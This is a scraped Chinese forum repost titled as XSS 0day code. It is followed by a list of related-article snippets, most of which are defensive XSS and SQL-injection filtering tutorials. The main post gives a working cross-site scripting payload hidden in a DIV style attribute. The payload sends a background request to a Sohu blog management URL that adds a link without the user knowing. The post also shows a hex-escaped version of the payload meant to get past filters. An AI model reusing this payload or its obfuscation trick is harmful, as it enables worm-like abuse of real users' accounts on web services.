XSS 0DAY代码
文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.
其实很简单,就是两次转码.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII转码参考 http://s0n9.blog.sohu.com/16002288.html
写成下面16进制转义字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
相关推荐
-
XSS 0DAY代码
文章作者:茄子宝 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 看到梦之光芒放出来了!我也不藏了! 10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧. 其实很简单,就是两次转码. <DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("
-
PHP实现的防止跨站和xss攻击代码【来自阿里云】
本文实例讲述了PHP实现的防止跨站和xss攻击代码.分享给大家供大家参考,具体如下: 文档说明: 1.将waf.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入.跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPC
-
PHP开发中常见的安全问题详解和解决方法(如Sql注入、CSRF、Xss、CC等)
浅谈Php安全和防Sql注入,防止Xss攻击,防盗链,防CSRF 前言: 首先,笔者不是web安全的专家,所以这不是web安全方面专家级文章,而是学习笔记.细心总结文章,里面有些是我们phper不易发现或者说不重视的东西.所以笔者写下来方便以后查阅.在大公司肯定有专门的web安全测试员,安全方面不是phper考虑的范围.但是作为一个phper对于安全知识是:"知道有这么一回事,编程时自然有所注意". 目录: 1.php一些安全配置(1)关闭php提示错误功能(2)关闭一些"坏
-
PHP实现表单提交数据的验证处理功能【防SQL注入和XSS攻击等】
本文实例讲述了PHP实现表单提交数据的验证处理功能.分享给大家供大家参考,具体如下: 防XSS攻击代码: /** * 安全过滤函数 * * @param $string * @return string */ function safe_replace($string) { $string = str_replace('%20','',$string); $string = str_replace('%27','',$string); $string = str_replace('%2527',
-
web网络安全分析反射型XSS攻击原理
目录 反射型XSS攻击 反射型XSS代码分析 反射型XSS攻击 页面http://127.0.0.1/xss/xss1.php实现的功能是在"输入"表单中输入内容,单击"提交"按钮后,将输入的内容放到"输出"表单中,例如当输入"11",单击"提交"按钮时,"11"将被输出到"输出"表单中,效果如图68所示. 图68 输入参数被输出到页面 当访问http://127.0
-
浅谈基于Token的WEB后台认证机制
几种常用的认证机制 HTTP Basic Auth HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和password,简言之,Basic Auth是配合RESTful API 使用的最简单的认证方式,只需提供用户名密码即可,但由于有把用户名密码暴露给第三方客户端的风险,在生产环境下被使用的越来越少.因此,在开发对外开放的RESTful API时,尽量避免采用HTTP Basic Auth OAuth OAuth(开放授权)是一个开放的授权标准,允许用户让
-
Springboot实现XSS漏洞过滤的示例代码
背景 前阵子做了几个项目,终于开发完毕,进入了测试阶段,信心满满将项目部署到测试环境,然后做了安全测评之后..... (什么!你竟然说我代码不安全???) 然后测出了 Xss漏洞 安全的问题 解决方案 场景:可以在页面输入框输入JS脚本, 攻击者可以利用此漏洞执行恶意的代码 ! 问题演示 所以我们要对于前端传输的参数做处理,做统一全局过滤处理 既然要过滤处理,我们首先需要实现一个自定义过滤器 总共包含以下四部分 XssUtil XssFilterAutoConfig XssHttpSe
-
从网上搜到的phpwind 0day的代码
<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Codz By 剑心</title><style type="text/css">body,td {font-family: "Tahoma";font-size: "12p
-
使用AngularJS中的SCE来防止XSS攻击的方法
这篇文章展示了有关XSS(跨站脚本)的不同方案以及怎样使用AngularJS中SCE($sceProvider),sanitize service这些特性来正确处理XSS.如果我遗漏了什么重要的地方请直接评论/建议.同时,错别字请见谅. 以下几点内容将是我接下来要讲述的重点: 全部转码HTML 安全插入HTML的同时忽略类似"script"这样的标签.如果不加以注意,这将一样存在风险同时也会丑化页面,尤其是在有"img"标签的时候. 依赖并插入纯HTML:这也有风险
-
Angular 4中如何显示内容的CSS样式示例代码
前言 在开始本文的正文之前,我们先来看一下angular2中将带标签的文本输出在页面上的相关内容,为了系统性的防范XSS问题,Angular默认把所有值都当做不可信任的. 当值从模板中以属性(Property).DOM元素属性(Attribte).CSS类绑定或插值表达式等途径插入到DOM中的时候, Angular将对这些值进行无害化处理(Sanitize),对不可信的值进行编码. h3>Binding innerHTML</h3> <p>Bound value:</p
随机推荐
- javascript Math.random()随机数函数
- Go语言hello world实例
- js实现商品抛物线加入购物车特效
- JavaScript实现的原生态Tab标签页功能【兼容IE6】
- PHP永久登录、记住我功能实现方法和安全做法
- delphi简单判断程序30秒没有键盘和鼠标动作示例
- Android菜单(动画菜单、360波纹菜单)
- 提高iOS开发效率的小技巧与思路
- php gd等比例缩放压缩图片函数
- js 事件对象 鼠标滚轮效果演示说明
- 解析PHP 5.5 新特性
- PHP获取http请求的头信息实现步骤
- asp.net网站防恶意刷新的Cookies与Session解决方法
- 移动端手指放大缩小插件与js源码
- 轻松创建nodejs服务器(2):nodejs服务器的构成分析
- Mysql数据库表定期备份的实现详解
- 为数据库生成某个字段充填随机数的存储过程
- 详解Nginx HTTP负载均衡和反向代理配置
- java高并发写入用户信息到数据库的几种方法
- PHP简单获取上月、本月、近15天、近30天的方法示例